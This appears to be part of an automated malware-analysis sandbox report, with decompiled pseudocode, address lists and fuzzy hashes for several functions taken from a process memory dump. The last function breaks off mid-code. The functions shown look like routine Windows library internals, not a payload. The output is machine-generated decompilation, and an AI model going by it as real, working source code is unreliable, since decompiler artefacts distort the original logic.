				intOrPtr _t75;
				intOrPtr _t84;
				intOrPtr _t87;
				intOrPtr* _t90;
				signed short* _t91;
				signed int _t95;
				signed short* _t96;
				intOrPtr _t97;
				intOrPtr _t102;
				signed int _t108;
				intOrPtr _t110;
				signed int _t111;
				signed short* _t112;
				void* _t113;
				signed int _t116;
				signed short** _t119;
				short* _t120;
				signed int _t123;
				signed int _t124;
				void* _t125;
				intOrPtr _t127;
				signed int _t128;

				_t90 = __ecx;
				_v16 = __edx;
				_t108 = _a4;
				_v28 = __ecx;
				_t4 = _t108 - 1; // -1
				if(_t4 > 0x13) {
					L15:
					_t56 = 0xc0000100;
					L16:
					return _t56;
				}
				_t57 = _t108 * 0x1c;
				_v32 = _t57;
				_t6 = _t57 + 0x4ba8204; // 0x0
				_t123 =  *_t6;
				_t7 = _t57 + 0x4ba8208; // 0x4ba8207
				_t8 = _t57 + 0x4ba8208; // 0x4ba8207
				_t119 = _t8;
				_v36 = _t123;
				_t110 = _t7 + _t123 * 8;
				_v24 = _t110;
				_t111 = _a4;
				if(_t119 >= _t110) {
					L12:
					if(_t123 != 3) {
						_t58 =  *0x4ba8450; // 0x95179c
						if(_t58 == 0) {
							_t58 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x48));
						}
					} else {
						_t26 = _t57 + 0x4ba821c; // 0x0
						_t58 =  *_t26;
					}
					 *_t90 = _t58;
					goto L15;
				} else {
					goto L2;
				}
				while(1) {
					_t116 =  *_t61 & 0x0000ffff;
					_t128 =  *(_t127 + _t61) & 0x0000ffff;
					if(_t116 == _t128) {
						goto L18;
					}
					L5:
					if(_t116 >= 0x61) {
						if(_t116 > 0x7a) {
							_t97 =  *0x4ba6d5c; // 0x7fe10654
							_t72 =  *0x4ba6d5c; // 0x7fe10654
							_t75 =  *0x4ba6d5c; // 0x7fe10654
							_t116 =  *((intOrPtr*)(_t75 + (( *(_t72 + (( *(_t97 + (_t116 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t116 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t116 & 0x0000000f)) * 2)) + _t116 & 0x0000ffff;
						} else {
							_t116 = _t116 - 0x20;
						}
					}
					if(_t128 >= 0x61) {
						if(_t128 > 0x7a) {
							_t102 =  *0x4ba6d5c; // 0x7fe10654
							_t84 =  *0x4ba6d5c; // 0x7fe10654
							_t87 =  *0x4ba6d5c; // 0x7fe10654
							_t128 =  *((intOrPtr*)(_t87 + (( *(_t84 + (( *(_t102 + (_t128 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t128 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t128 & 0x0000000f)) * 2)) + _t128 & 0x0000ffff;
						} else {
							_t128 = _t128 - 0x20;
						}
					}
					if(_t116 == _t128) {
						_t61 = _v12;
						_t96 = _v8;
					} else {
						_t113 = _t116 - _t128;
						L9:
						_t111 = _a4;
						if(_t113 == 0) {
							_t115 =  &(( *_t119)[_t111 + 1]);
							_t33 =  &(_t119[1]); // 0x100
							_t120 = _a8;
							_t95 =  *_t33 -  &(( *_t119)[_t111 + 1]) >> 1;
							_t35 = _t95 - 1; // 0xff
							_t124 = _t35;
							if(_t120 == 0) {
								L27:
								 *_a16 = _t95;
								_t56 = 0xc0000023;
								goto L16;
							}
							if(_t124 >= _a12) {
								if(_a12 >= 1) {
									 *_t120 = 0;
								}
								goto L27;
							}
							 *_a16 = _t124;
							_t125 = _t124 + _t124;
							E04AFF3E0(_t120, _t115, _t125);
							_t56 = 0;
							 *((short*)(_t125 + _t120)) = 0;
							goto L16;
						}
						_t119 =  &(_t119[2]);
						if(_t119 < _v24) {
							L2:
							_t91 =  *_t119;
							_t61 = _t91;
							_v12 = _t61;
							_t112 =  &(_t61[_t111]);
							_v8 = _t112;
							if(_t61 >= _t112) {
								break;
							} else {
								_t127 = _v16 - _t91;
								_t96 = _t112;
								_v20 = _t127;
								_t116 =  *_t61 & 0x0000ffff;
								_t128 =  *(_t127 + _t61) & 0x0000ffff;
								if(_t116 == _t128) {
									goto L18;
								}
								goto L5;
							}
						} else {
							_t90 = _v28;
							_t57 = _v32;
							_t123 = _v36;
							goto L12;
						}
					}
					L18:
					_t61 =  &(_t61[1]);
					_v12 = _t61;
					if(_t61 >= _t96) {
						break;
					}
					_t127 = _v20;
				}
				_t113 = 0;
				goto L9;
			}

0x04ae2ae4
0x04ae2aec
0x04ae2aef
0x04ae2af4
0x04ae2af7
0x04ae2afd
0x04ae2b92
0x04ae2b92
0x04ae2b97
0x04ae2b9c
0x04ae2b9c
0x04ae2b03
0x04ae2b06
0x04ae2b09
0x04ae2b09
0x04ae2b0f
0x04ae2b15
0x04ae2b15
0x04ae2b1b
0x04ae2b1e
0x04ae2b21
0x04ae2b26
0x04ae2b29
0x04ae2b81
0x04ae2b84
0x04ae2c0e
0x04ae2c15
0x04ae2c24
0x04ae2c24
0x04ae2b8a
0x04ae2b8a
0x04ae2b8a
0x04ae2b8a
0x04ae2b90
0x00000000
0x00000000
0x00000000
0x00000000
0x04ae2b4a
0x04ae2b4a
0x04ae2b4d
0x04ae2b53
0x00000000
0x00000000
0x04ae2b55
0x04ae2b58
0x04ae2bb7
0x04b25d1b
0x04b25d37
0x04b25d47
0x04b25d53
0x04ae2bbd
0x04ae2bbd
0x04ae2bbd
0x04ae2bb7
0x04ae2b5d
0x04ae2c2f
0x04b25d5b
0x04b25d77
0x04b25d87
0x04b25d93
0x04ae2c35
0x04ae2c35
0x04ae2c35
0x04ae2c2f
0x04ae2b65
0x04ae2b9f
0x04ae2ba2
0x04ae2b67
0x04ae2b67
0x04ae2b69
0x04ae2b6b
0x04ae2b6e
0x04ae2bc9
0x04ae2bcc
0x04ae2bcf
0x04ae2bd4
0x04ae2bd6
0x04ae2bd6
0x04ae2bdb
0x04ae2c02
0x04ae2c05
0x04ae2c07
0x00000000
0x04ae2c07
0x04ae2be0
0x04ae2c00
0x04ae2c3f
0x04ae2c3f
0x00000000
0x04ae2c00
0x04ae2be5
0x04ae2be7
0x04ae2bec
0x04ae2bf4
0x04ae2bf6
0x00000000
0x04ae2bf6
0x04ae2b70
0x04ae2b76
0x04ae2b2b
0x04ae2b2b
0x04ae2b2d
0x04ae2b2f
0x04ae2b32
0x04ae2b35
0x04ae2b3a
0x00000000
0x04ae2b40
0x04ae2b43
0x04ae2b45
0x04ae2b47
0x04ae2b4a
0x04ae2b4d
0x04ae2b53
0x00000000
0x00000000
0x00000000
0x04ae2b53
0x04ae2b78
0x04ae2b78
0x04ae2b7b
0x04ae2b7e
0x00000000
0x04ae2b7e
0x04ae2b76
0x04ae2ba5
0x04ae2ba5
0x04ae2ba8
0x04ae2bad
0x00000000
0x00000000
0x04ae2baf
0x04ae2baf
0x04ae2bc2
0x00000000

Memory Dump Source

Source File: 00000015.00000002.506314048.0000000004A90000.00000040.00000001.sdmp, Offset: 04A90000, based on PE: true

Associated: 00000015.00000002.507407731.0000000004BAB000.00000040.00000001.sdmp Download File
Associated: 00000015.00000002.507425477.0000000004BAF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e9880d482821c874a1f91d4419405f7c022b07ea30247633bff0a6497e6b999
Instruction ID: fb24b1f33e278c8d9dc7235e907d3d1fae8e6f71da2e84f3ea377ab15ab0c470
Opcode Fuzzy Hash: 3e9880d482821c874a1f91d4419405f7c022b07ea30247633bff0a6497e6b999
Instruction Fuzzy Hash: 3551A377B001158FCB14DF1EC890ABDB7B5FB98700715849AE866AB314E734BE51D790

Uniqueness

Uniqueness Score: -1.00%

Function 04ADDBE9, Relevance: .1, Instructions: 149
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E04ADDBE9(intOrPtr __ecx, intOrPtr __edx, signed int* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v5;
				signed int _v12;
				signed int* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				void* __ebx;
				void* __edi;
				signed int _t54;
				char* _t58;
				signed int _t66;
				intOrPtr _t67;
				intOrPtr _t68;
				intOrPtr _t72;
				intOrPtr _t73;
				signed int* _t75;
				intOrPtr _t79;
				intOrPtr _t80;
				char _t82;
				signed int _t83;
				signed int _t84;
				signed int _t88;
				signed int _t89;
				intOrPtr _t90;
				intOrPtr _t92;
				signed int _t97;
				intOrPtr _t98;
				intOrPtr* _t99;
				signed int* _t101;
				signed int* _t102;
				intOrPtr* _t103;
				intOrPtr _t105;
				signed int _t106;
				void* _t118;

				_t92 = __edx;
				_t75 = _a4;
				_t98 = __ecx;
				_v44 = __edx;
				_t106 = _t75[1];
				_v40 = __ecx;
				if(_t106 < 0 || _t106 <= 0 &&  *_t75 < 0) {
					_t82 = 0;
				} else {
					_t82 = 1;
				}
				_v5 = _t82;
				_t6 = _t98 + 0xc8; // 0xc9
				_t101 = _t6;
				 *((intOrPtr*)(_t98 + 0xd4)) = _a12;
				_v16 = _t92 + ((0 | _t82 != 0x00000000) - 0x00000001 & 0x00000048) + 8;
				 *((intOrPtr*)(_t98 + 0xd8)) = _a8;
				if(_t82 != 0) {
					 *(_t98 + 0xde) =  *(_t98 + 0xde) | 0x00000002;
					_t83 =  *_t75;
					_t54 = _t75[1];
					 *_t101 = _t83;
					_t84 = _t83 | _t54;
					_t101[1] = _t54;
					if(_t84 == 0) {
						_t101[1] = _t101[1] & _t84;
						 *_t101 = 1;
					}
					goto L19;
				} else {
					if(_t101 == 0) {
						E04ABCC50(E04AB4510(0xc000000d));
						_t88 =  *_t101;
						_t97 = _t101[1];
						L15:
						_v12 = _t88;
						_t66 = _t88 -  *_t75;
						_t89 = _t97;
						asm("sbb ecx, [ebx+0x4]");
						_t118 = _t89 - _t97;
						if(_t118 <= 0 && (_t118 < 0 || _t66 < _v12)) {
							_t66 = _t66 | 0xffffffff;
							_t89 = 0x7fffffff;
						}
						 *_t101 = _t66;
						_t101[1] = _t89;
						L19:
						if(E04AD7D50() != 0) {
							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t58 = 0x7ffe0386;
						}
						_t102 = _v16;
						if( *_t58 != 0) {
							_t58 = E04B88ED6(_t102, _t98);
						}
						_t76 = _v44;
						E04AD2280(_t58, _v44);
						E04ADDD82(_v44, _t102, _t98);
						E04ADB944(_t102, _v5);
						return E04ACFFB0(_t76, _t98, _t76);
					}
					_t99 = 0x7ffe03b0;
					do {
						_t103 = 0x7ffe0010;
						do {
							_t67 =  *0x4ba8628; // 0x0
							_v28 = _t67;
							_t68 =  *0x4ba862c; // 0x0
							_v32 = _t68;
							_v24 =  *((intOrPtr*)(_t99 + 4));
							_v20 =  *_t99;
							while(1) {
								_t97 =  *0x7ffe000c;
								_t90 =  *0x7FFE0008;
								if(_t97 ==  *_t103) {
									goto L10;
								}
								asm("pause");
							}
							L10:
							_t79 = _v24;
							_t99 = 0x7ffe03b0;
							_v12 =  *0x7ffe03b0;
							_t72 =  *0x7FFE03B4;
							_t103 = 0x7ffe0010;
							_v36 = _t72;
						} while (_v20 != _v12 || _t79 != _t72);
						_t73 =  *0x4ba8628; // 0x0
						_t105 = _v28;
						_t80 =  *0x4ba862c; // 0x0
					} while (_t105 != _t73 || _v32 != _t80);
					_t98 = _v40;
					asm("sbb edx, [ebp-0x20]");
					_t88 = _t90 - _v12 - _t105;
					_t75 = _a4;
					asm("sbb edx, eax");
					_t31 = _t98 + 0xc8; // 0x4b7fb53
					_t101 = _t31;
					 *_t101 = _t88;
					_t101[1] = _t97;
					goto L15;
				}
			}

0x04addbe9
0x04addbf2
0x04addbf7
0x04addbf9
0x04addbfc
0x04addc00
0x04addc03
0x04addc14
0x04addd54
0x04addd54
0x04addd54
0x04addc18
0x04addc1d
0x04addc1d
0x04addc32
0x04addc3b
0x04addc3e
0x04addc46
0x04addd5b
0x04addd62
0x04addd64
0x04addd67
0x04addd69
0x04addd6b
0x04addd6e
0x04addd70
0x04addd73
0x04addd73
0x00000000
0x04addc4c
0x04addc4e
0x04b23ae3
0x04b23ae8
0x04b23aea
0x04addce7
0x04addce9
0x04addcec
0x04addcee
0x04addcf0
0x04addcf3
0x04addcf5
0x04b23af2
0x04b23af5
0x04b23af5
0x04addd06
0x04addd08
0x04addd0b
0x04addd12
0x04b23b08
0x04addd18
0x04addd18
0x04addd18
0x04addd20
0x04addd23
0x04b23b16
0x04b23b16
0x04addd29
0x04addd2d
0x04addd36
0x04addd40
0x04addd51
0x04addd51
0x04addc54
0x04addc59
0x04addc59
0x04addc5e
0x04addc5e
0x04addc63
0x04addc66
0x04addc6b
0x04addc78
0x04addc7b
0x04addc81
0x04addc81
0x04addc83
0x04addc89
0x00000000
0x00000000
0x04addd7b
0x04addd7b
0x04addc8f
0x04addc8f
0x04addc92
0x04addc99
0x04addc9f
0x04addca5
0x04addcaa
0x04addcaa
0x04addcb3
0x04addcb8
0x04addcbb
0x04addcc1
0x04addccf
0x04addcd2
0x04addcd5
0x04addcd7
0x04addcda
0x04addcdc
0x04addcdc
0x04addce2
0x04addce4
0x00000000
0x04addce4

Memory Dump Source

Source File: 00000015.00000002.506314048.0000000004A90000.00000040.00000001.sdmp, Offset: 04A90000, based on PE: true

Associated: 00000015.00000002.507407731.0000000004BAB000.00000040.00000001.sdmp Download File
Associated: 00000015.00000002.507425477.0000000004BAF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 08a9a46928a3520430fe5cf3a80feb8986fcbaddce6722cf5c0e47937dacc902
Instruction ID: f7f5fced7260fdb5914a6fd8c2ad5a49bd975b3b59f14cd5a9bff7381912795c
Opcode Fuzzy Hash: 08a9a46928a3520430fe5cf3a80feb8986fcbaddce6722cf5c0e47937dacc902
Instruction Fuzzy Hash: B651BE71A01215DFCB14CF68C580AAEBBF5FB49310F24855AD99AAB340EB31BD40CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 04ACEF40, Relevance: .1, Instructions: 147
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E04ACEF40(intOrPtr __ecx) {
				char _v5;
				char _v6;
				char _v7;
				char _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t58;
				char _t59;
				signed char _t69;
				void* _t73;
				signed int _t74;
				char _t79;
				signed char _t81;
				signed int _t85;
				signed int _t87;
				intOrPtr _t90;
				signed char* _t91;
				void* _t92;
				signed int _t94;
				void* _t96;

				_t90 = __ecx;
				_v16 = __ecx;
				if(( *(__ecx + 0x14) & 0x04000000) != 0) {
					_t58 =  *((intOrPtr*)(__ecx));
					if(_t58 != 0xffffffff &&  *((intOrPtr*)(_t58 + 8)) == 0) {
						E04AB9080(_t73, __ecx, __ecx, _t92);
					}
				}
				_t74 = 0;
				_t96 =  *0x7ffe036a - 1;
				_v12 = 0;
				_v7 = 0;
				if(_t96 > 0) {
					_t74 =  *(_t90 + 0x14) & 0x00ffffff;
					_v12 = _t74;
					_v7 = _t96 != 0;
				}
				_t79 = 0;
				_v8 = 0;
				_v5 = 0;
				while(1) {
					L4:
					_t59 = 1;
					L5:
					while(1) {
						if(_t59 == 0) {
							L12:
							_t21 = _t90 + 4; // 0x779cc21e
							_t87 =  *_t21;
							_v6 = 0;
							if(_t79 != 0) {
								if((_t87 & 0x00000002) != 0) {
									goto L19;
								}
								if((_t87 & 0x00000001) != 0) {
									_v6 = 1;
									_t74 = _t87 ^ 0x00000003;
								} else {
									_t51 = _t87 - 2; // -2
									_t74 = _t51;
								}
								goto L15;
							} else {
								if((_t87 & 0x00000001) != 0) {
									_v6 = 1;
									_t74 = _t87 ^ 0x00000001;
								} else {
									_t26 = _t87 - 4; // -4
									_t74 = _t26;
									if((_t74 & 0x00000002) == 0) {
										_t74 = _t74 - 2;
									}
								}
								L15:
								if(_t74 == _t87) {
									L19:
									E04AB2D8A(_t74, _t90, _t87, _t90);
									_t74 = _v12;
									_v8 = 1;
									if(_v7 != 0 && _t74 > 0x64) {
										_t74 = _t74 - 1;
										_v12 = _t74;
									}
									_t79 = _v5;
									goto L4;
								}
								asm("lock cmpxchg [esi], ecx");
								if(_t87 != _t87) {
									_t74 = _v12;
									_t59 = 0;
									_t79 = _v5;
									continue;
								}
								if(_v6 != 0) {
									_t74 = _v12;
									L25:
									if(_v7 != 0) {
										if(_t74 < 0x7d0) {
											if(_v8 == 0) {
												_t74 = _t74 + 1;
											}
										}
										_t38 = _t90 + 0x14; // 0x0
										_t39 = _t90 + 0x14; // 0x0
										_t85 = ( *_t38 ^ _t74) & 0x00ffffff ^  *_t39;
										if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
											_t85 = _t85 & 0xff000000;
										}
										 *(_t90 + 0x14) = _t85;
									}
									 *((intOrPtr*)(_t90 + 0xc)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
									 *((intOrPtr*)(_t90 + 8)) = 1;
									return 0;
								}
								_v5 = 1;
								_t87 = _t74;
								goto L19;
							}
						}
						_t94 = _t74;
						_v20 = 1 + (0 | _t79 != 0x00000000) * 2;
						if(_t74 == 0) {
							goto L12;
						} else {
							_t91 = _t90 + 4;
							goto L8;
							L9:
							while((_t81 & 0x00000001) != 0) {
								_t69 = _t81;
								asm("lock cmpxchg [edi], edx");
								if(_t69 != _t81) {
									_t81 = _t69;
									continue;
								}
								_t90 = _v16;
								goto L25;
							}
							asm("pause");
							_t94 = _t94 - 1;
							if(_t94 != 0) {
								L8:
								_t81 =  *_t91;
								goto L9;
							} else {
								_t90 = _v16;
								_t79 = _v5;
								goto L12;
							}
						}
					}
				}
			}

0x04acef4b
0x04acef4d
0x04acef57
0x04acf0bd
0x04acf0c2
0x04acf0d2
0x04acf0d2
0x04acf0c2
0x04acef5d
0x04acef5f
0x04acef67
0x04acef6a
0x04acef6d
0x04acef74
0x04acef7f
0x04acef82
0x04acef82
0x04acef86
0x04acef88
0x04acef8c
0x04acef8f
0x04acef8f
0x04acef8f
0x00000000
0x04acef91
0x04acef93
0x04acefc4
0x04acefc4
0x04acefc4
0x04acefca
0x04acefd0
0x04acf0a6
0x00000000
0x00000000
0x04acf0af
0x04b1bb06
0x04b1bb0a
0x04acf0b5
0x04acf0b5
0x04acf0b5
0x04acf0b5
0x00000000
0x04acefd6
0x04acefd9
0x04acf0de
0x04acf0e2
0x04acefdf
0x04acefdf
0x04acefdf
0x04acefe5
0x04b1bafc
0x04b1bafc
0x04acefe5
0x04acefeb
0x04acefed
0x04acf00f
0x04acf011
0x04acf01a
0x04acf01d
0x04acf021
0x04acf028
0x04acf029
0x04acf029
0x04acf02c
0x00000000
0x04acf02c
0x04aceff3
0x04aceff9
0x04acf0ea
0x04acf0ed
0x04acf0ef
0x00000000
0x04acf0ef
0x04acf003
0x04b1bb12
0x04acf045
0x04acf049
0x04acf051
0x04acf09e
0x04acf0a0
0x04acf0a0
0x04acf09e
0x04acf053
0x04acf064
0x04acf064
0x04acf06b
0x04b1bb1a
0x04b1bb1a
0x04acf071
0x04acf071
0x04acf07d
0x04acf082
0x04acf08f
0x04acf08f
0x04acf009
0x04acf00d
0x00000000
0x04acf00d
0x04acefd0
0x04acef97
0x04acefa5
0x04acefaa
0x00000000
0x04acefac
0x04acefac
0x04acefac
0x00000000
0x04acefb2
0x04acf036
0x04acf03a
0x04acf040
0x04acf090
0x00000000
0x04acf092
0x04acf042
0x00000000
0x04acf042
0x04acefb7
0x04acefb9
0x04acefbc
0x04acefb0
0x04acefb0
0x00000000
0x04acefbe
0x04acefbe
0x04acefc1
0x00000000
0x04acefc1
0x04acefbc
0x04acefaa
0x04acef91

Memory Dump Source

Source File: 00000015.00000002.506314048.0000000004A90000.00000040.00000001.sdmp, Offset: 04A90000, based on PE: true

Associated: 00000015.00000002.507407731.0000000004BAB000.00000040.00000001.sdmp Download File
Associated: 00000015.00000002.507425477.0000000004BAF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
Instruction ID: 3af7544e476e2b84d293584ca49c9fec26fed56a4e3c06ba0f08c57f9a7737ff
Opcode Fuzzy Hash: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
Instruction Fuzzy Hash: 0C510130A04249DFEB64CF68C1C0BAEBBB2EF05314F2881ADE555972C1E375B989D791

Uniqueness

Uniqueness Score: -1.00%

Function 04B8740D, Relevance: .1, Instructions: 141
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E04B8740D(intOrPtr __ecx, signed short* __edx, intOrPtr _a4) {
				signed short* _v8;
				intOrPtr _v12;
				intOrPtr _t55;
				void* _t56;
				intOrPtr* _t66;
				intOrPtr* _t69;
				void* _t74;
				intOrPtr* _t78;
				intOrPtr* _t81;
				intOrPtr* _t82;
				intOrPtr _t83;
				signed short* _t84;
				intOrPtr _t85;
				signed int _t87;
				intOrPtr* _t90;
				intOrPtr* _t93;
				intOrPtr* _t94;
				void* _t98;

				_t84 = __edx;
				_t80 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t55 = __ecx;
				_v8 = __edx;
				_t87 =  *__edx & 0x0000ffff;
				_v12 = __ecx;
				_t3 = _t55 + 0x154; // 0x154
				_t93 = _t3;
				_t78 =  *_t93;
				_t4 = _t87 + 2; // 0x2
				_t56 = _t4;
				while(_t78 != _t93) {
					if( *((intOrPtr*)(_t78 + 0x14)) != _t56) {
						L4:
						_t78 =  *_t78;
						continue;
					} else {
						_t7 = _t78 + 0x18; // 0x18
						if(E04B0D4F0(_t7, _t84[2], _t87) == _t87) {
							_t40 = _t78 + 0xc; // 0xc
							_t94 = _t40;
							_t90 =  *_t94;
							while(_t90 != _t94) {
								_t41 = _t90 + 8; // 0x8
								_t74 = E04AFF380(_a4, _t41, 0x10);
								_t98 = _t98 + 0xc;
								if(_t74 != 0) {
									_t90 =  *_t90;
									continue;
								}
								goto L12;
							}
							_t82 = L04AD4620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
							if(_t82 != 0) {
								_t46 = _t78 + 0xc; // 0xc
								_t69 = _t46;
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t85 =  *_t69;
								if( *((intOrPtr*)(_t85 + 4)) != _t69) {
									L20:
									_t82 = 3;
									asm("int 0x29");
								}
								 *((intOrPtr*)(_t82 + 4)) = _t69;
								 *_t82 = _t85;
								 *((intOrPtr*)(_t85 + 4)) = _t82;
								 *_t69 = _t82;
								 *(_t78 + 8) =  *(_t78 + 8) + 1;
								 *(_v12 + 0xdc) =  *(_v12 + 0xdc) | 0x00000010;
								goto L11;
							} else {
								L18:
								_push(0xe);
								_pop(0);
							}
						} else {
							_t84 = _v8;
							_t9 = _t87 + 2; // 0x2
							_t56 = _t9;
							goto L4;
						}
					}
					L12:
					return 0;
				}
				_t10 = _t87 + 0x1a; // 0x1a
				_t78 = L04AD4620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t10);
				if(_t78 == 0) {
					goto L18;
				} else {
					_t12 = _t87 + 2; // 0x2
					 *((intOrPtr*)(_t78 + 0x14)) = _t12;
					_t16 = _t78 + 0x18; // 0x18
					E04AFF3E0(_t16, _v8[2], _t87);
					 *((short*)(_t78 + _t87 + 0x18)) = 0;
					_t19 = _t78 + 0xc; // 0xc
					_t66 = _t19;
					 *((intOrPtr*)(_t66 + 4)) = _t66;
					 *_t66 = _t66;
					 *(_t78 + 8) =  *(_t78 + 8) & 0x00000000;
					_t81 = L04AD4620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
					if(_t81 == 0) {
						goto L18;
					} else {
						_t26 = _t78 + 0xc; // 0xc
						_t69 = _t26;
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t85 =  *_t69;
						if( *((intOrPtr*)(_t85 + 4)) != _t69) {
							goto L20;
						} else {
							 *((intOrPtr*)(_t81 + 4)) = _t69;
							 *_t81 = _t85;
							 *((intOrPtr*)(_t85 + 4)) = _t81;
							 *_t69 = _t81;
							_t83 = _v12;
							 *(_t78 + 8) = 1;
							 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
							_t34 = _t83 + 0x154; // 0x1ba
							_t69 = _t34;
							_t85 =  *_t69;
							if( *((intOrPtr*)(_t85 + 4)) != _t69) {
								goto L20;
							} else {
								 *_t78 = _t85;
								 *((intOrPtr*)(_t78 + 4)) = _t69;
								 *((intOrPtr*)(_t85 + 4)) = _t78;
								 *_t69 = _t78;
								 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
							}
						}
						goto L11;
					}
				}
				goto L12;
			}

0x04b8740d
0x04b8740d
0x04b87412
0x04b87413
0x04b87416
0x04b87418
0x04b8741c
0x04b8741f
0x04b87422
0x04b87422
0x04b87428
0x04b8742a
0x04b8742a
0x04b87451
0x04b87432
0x04b8744f
0x04b8744f
0x00000000
0x04b87434
0x04b87438
0x04b87443
0x04b87517
0x04b87517
0x04b8751a
0x04b87535
0x04b87520
0x04b87527
0x04b8752c
0x04b87531
0x04b87533
0x00000000
0x04b87533
0x00000000
0x04b87531
0x04b8754b
0x04b8754f
0x04b8755c
0x04b8755c
0x04b8755f
0x04b87560
0x04b87561
0x04b87562
0x04b87563
0x04b87568
0x04b8756a
0x04b8756c
0x04b8756d
0x04b8756d
0x04b8756f
0x04b87572
0x04b87574
0x04b87577
0x04b8757c
0x04b8757f
0x00000000
0x04b87551
0x04b87551
0x04b87551
0x04b87553
0x04b87553
0x04b87449
0x04b87449
0x04b8744c
0x04b8744c
0x00000000
0x04b8744c
0x04b87443
0x04b8750e
0x04b87514
0x04b87514
0x04b87455
0x04b87469
0x04b8746d
0x00000000
0x04b87473
0x04b87473
0x04b87476
0x04b87480
0x04b87484
0x04b8748e
0x04b87493
0x04b87493
0x04b87496
0x04b87499
0x04b874a1
0x04b874b1
0x04b874b5
0x00000000
0x04b874bb
0x04b874c1
0x04b874c1
0x04b874c4
0x04b874c5
0x04b874c6
0x04b874c7
0x04b874c8
0x04b874cd
0x00000000
0x04b874d3
0x04b874d3
0x04b874d6
0x04b874d8
0x04b874db
0x04b874dd
0x04b874e0
0x04b874e7
0x04b874ee
0x04b874ee
0x04b874f4
0x04b874f9
0x00000000
0x04b874fb
0x04b874fb
0x04b874fd
0x04b87500
0x04b87503
0x04b87505
0x04b87505
0x04b874f9
0x00000000
0x04b874cd
0x04b874b5
0x00000000

Memory Dump Source

Source File: 00000015.00000002.506314048.0000000004A90000.00000040.00000001.sdmp, Offset: 04A90000, based on PE: true

Associated: 00000015.00000002.507407731.0000000004BAB000.00000040.00000001.sdmp Download File
Associated: 00000015.00000002.507425477.0000000004BAF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
Instruction ID: d98a745aab3256bf796fed4724b7493ace45dc97f04307774dbbc1d8071340dd
Opcode Fuzzy Hash: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
Instruction Fuzzy Hash: F5518D71600606EFDB15DF54C980A96FBB5FF45308F28C1AAE9089F252E771F946CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 04AE2990, Relevance: .1, Instructions: 133
COMMON

Download Yara Rule

C-Code - Quality: 97%

			E04AE2990() {
				signed int* _t62;
				signed int _t64;
				intOrPtr _t66;
				signed short* _t69;
				intOrPtr _t76;
				signed short* _t79;
				void* _t81;
				signed int _t82;
				signed short* _t83;
				signed int _t87;
				intOrPtr _t91;
				void* _t98;
				signed int _t99;
				void* _t101;
				signed int* _t102;
				void* _t103;
				void* _t104;
				void* _t107;

				_push(0x20);
				_push(0x4b8ff00);
				E04B0D08C(_t81, _t98, _t101);
				 *((intOrPtr*)(_t103 - 0x28)) =  *[fs:0x18];
				_t99 = 0;
				 *((intOrPtr*)( *((intOrPtr*)(_t103 + 0x1c)))) = 0;
				_t82 =  *((intOrPtr*)(_t103 + 0x10));
				if(_t82 == 0) {
					_t62 = 0xc0000100;
				} else {
					 *((intOrPtr*)(_t103 - 4)) = 0;
					_t102 = 0xc0000100;
					 *((intOrPtr*)(_t103 - 0x30)) = 0xc0000100;
					_t64 = 4;
					while(1) {
						 *(_t103 - 0x24) = _t64;
						if(_t64 == 0) {
							break;
						}
						_t87 = _t64 * 0xc;
						 *(_t103 - 0x2c) = _t87;
						_t107 = _t82 -  *((intOrPtr*)(_t87 + 0x4a91664));
						if(_t107 <= 0) {
							if(_t107 == 0) {
								_t79 = E04AFE5C0( *((intOrPtr*)(_t103 + 0xc)),  *((intOrPtr*)(_t87 + 0x4a91668)), _t82);
								_t104 = _t104 + 0xc;
								__eflags = _t79;
								if(__eflags == 0) {
									_t102 = E04B351BE(_t82,  *((intOrPtr*)( *(_t103 - 0x2c) + 0x4a9166c)),  *((intOrPtr*)(_t103 + 0x14)), _t99, _t102, __eflags,  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
									 *((intOrPtr*)(_t103 - 0x30)) = _t102;
									break;
								} else {
									_t64 =  *(_t103 - 0x24);
									goto L5;
								}
								goto L13;
							} else {
								L5:
								_t64 = _t64 - 1;
								continue;
							}
						}
						break;
					}
					 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
					__eflags = _t102;
					if(_t102 < 0) {
						__eflags = _t102 - 0xc0000100;
						if(_t102 == 0xc0000100) {
